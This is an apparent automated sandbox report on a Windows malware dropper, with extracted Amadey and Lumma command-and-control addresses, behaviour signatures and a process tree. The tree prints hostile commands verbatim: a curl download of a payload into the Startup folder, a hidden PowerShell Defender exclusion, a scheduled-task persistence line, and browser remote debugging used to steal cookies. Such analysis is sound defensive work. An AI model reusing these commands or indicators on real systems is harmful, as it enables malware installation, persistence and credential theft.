Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
14-11-2024 01:45
General
-
Target
768f647ead725f22e417c380b0f0c14d802a91bbe75812a886b1d87c956becee.exe
-
Size
5.2MB
-
MD5
c578ef09bd0892e7cf984ca2496c635d
-
SHA1
e64e4e911f7304710c18575aa7c2435a6406fb1e
-
SHA256
768f647ead725f22e417c380b0f0c14d802a91bbe75812a886b1d87c956becee
-
SHA512
2a7a4078bee631a0e800290a072d753e5b47e899bac707a6373d9324ac1f81fe9c83f1f8e9a51dd1dab76d146aa61faf8080695c543b361e3cb3926c8d059ffb
-
SSDEEP
98304:G6due1ovcK0QjLp+ge3FHyvbFKENjQr4VIKNlTp8P54bzfNtRzncW1Gpq:ndbovvjLp/sKgEFQr4VIKNl4+bDJzKq
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://scriptyprefej.store
https://navygenerayk.store
https://founpiuer.store
https://necklacedmny.store
https://thumbystriw.store
https://fadehairucw.store
https://crisiwarny.store
https://presticitpo.store
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 19 IoCs
-
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 52 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\768f647ead725f22e417c380b0f0c14d802a91bbe75812a886b1d87c956becee.exe"C:\Users\Admin\AppData\Local\Temp\768f647ead725f22e417c380b0f0c14d802a91bbe75812a886b1d87c956becee.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h1c02.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h1c02.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1f62N1.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1f62N1.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1005956001\f2598e4572.exe"C:\Users\Admin\AppData\Local\Temp\1005956001\f2598e4572.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffcc75bcc40,0x7ffcc75bcc4c,0x7ffcc75bcc587⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1996 /prefetch:27⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:37⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1684,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:87⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:17⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3452 /prefetch:17⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3636,i,4760673659492707295,15494938158206308571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:17⤵
- Uses browser remote debugging
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 14646⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exeC:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe7⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E4C.tmp\3E6C.tmp\3E6D.bat C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c Add-MpPreference -ExclusionPath ""9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\curl.execurl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"9⤵
- Drops startup file
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"9⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe"C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1006097001\ba5f3f4658.exe"C:\Users\Admin\AppData\Local\Temp\1006097001\ba5f3f4658.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ba5f3f4658.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.06⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffcd71646f8,0x7ffcd7164708,0x7ffcd71647187⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1996 /prefetch:27⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14441548309034020492,5298483546845723720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:17⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ba5f3f4658.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.06⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffcd71646f8,0x7ffcd7164708,0x7ffcd71647187⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006098001\3f0bcbc3dc.exe"C:\Users\Admin\AppData\Local\Temp\1006098001\3f0bcbc3dc.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1006100001\cf635032f7.exe"C:\Users\Admin\AppData\Local\Temp\1006100001\cf635032f7.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2G3151.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2G3151.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3R65J.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3R65J.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3880 -ip 38801⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD55289823f9b8a9f7a5cae275b5a7791b0
SHA191ea95b5b410c2a28b54a27e8d43da24ecc36cca
SHA25611c87103c69e1ad5516c0d92558776c13dafe18098cb853f2668fce6d6fc92b2
SHA5121982289cd1c56f7c15d6eef6afded04b2a69202ca3b95a6206868b7284401cc46f204d91fac2f227907c2e53e327f2d6a56d8216b7a77bbc7b0c899391b1efa4
-
Filesize
14B
MD5ef48733031b712ca7027624fff3ab208
SHA1da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029
-
Filesize
152B
MD57de1bbdc1f9cf1a58ae1de4951ce8cb9
SHA1010da169e15457c25bd80ef02d76a940c1210301
SHA2566e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e
SHA512e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c
-
Filesize
152B
MD585ba073d7015b6ce7da19235a275f6da
SHA1a23c8c2125e45a0788bac14423ae1f3eab92cf00
SHA2565ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617
SHA512eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3
-
Filesize
264B
MD54cb2c103d058d64e25e28be161a3f2ae
SHA1de8c4fe567bcd27fa06cd182d9c569f98dbec43c
SHA2564c3ba458fdcd4f8a0537432c4582435cfabd11020ff5fd14bddc1858049c5fb0
SHA5121164dd7e10cb2655b288c711a2a01539dde69af2bc18bdd745a487e123a3269dea40b56b564462b5f16a6c5b1d46d2cbcb1aef54c07f8e632d6273f15ce7e61c
-
Filesize
437B
MD505592d6b429a6209d372dba7629ce97c
SHA1b4d45e956e3ec9651d4e1e045b887c7ccbdde326
SHA2563aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd
SHA512caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa
-
Filesize
6KB
MD5e2b14866b264470054686e7a98326844
SHA178671a0876c48e5cadfce8732f74e98168f0509f
